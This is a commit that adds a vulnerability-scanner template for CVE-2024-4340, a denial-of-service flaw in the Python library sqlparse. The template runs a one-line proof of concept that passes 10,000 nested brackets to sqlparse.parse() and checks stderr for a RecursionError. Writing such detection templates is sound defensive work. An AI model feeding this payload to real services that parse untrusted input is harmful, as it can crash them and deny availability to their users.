Merge pull request #10474 from KoYejune0302/add-rule2

Create CVE-2024-4340
2024-10-08 13:58:08 +07:00 · 2024-10-08 13:58:08 +07:00 · 01367fbc42
parent 095b2a705f 040110c21d
commit 01367fbc42
1 changed files with 29 additions and 0 deletions
--- a/code/cves/2024/CVE-2024-4340.yaml
+++ b/code/cves/2024/CVE-2024-4340.yaml
@ -0,0 +1,29 @@
+id: CVE-2024-4340
+
+info:
+  name: sqlparse - Denial of Service
+  author: KoYejune0302,cheoljun99,sim4110,gy741
+  severity: high
+  description: |
+    Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2024-4340
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-4340
+  tags: cve,cve2024,py,code,dos,python,sqlparse
+
+self-contained: true
+code:
+  - engine:
+      - sh
+      - bash
+    source: |
+      python -c "import sqlparse; sqlparse.parse('[' * 10000 + ']' * 10000)"
+
+    matchers:
+      - type: word
+        part: stderr
+        words:
+          - "RecursionError: maximum recursion depth exceeded"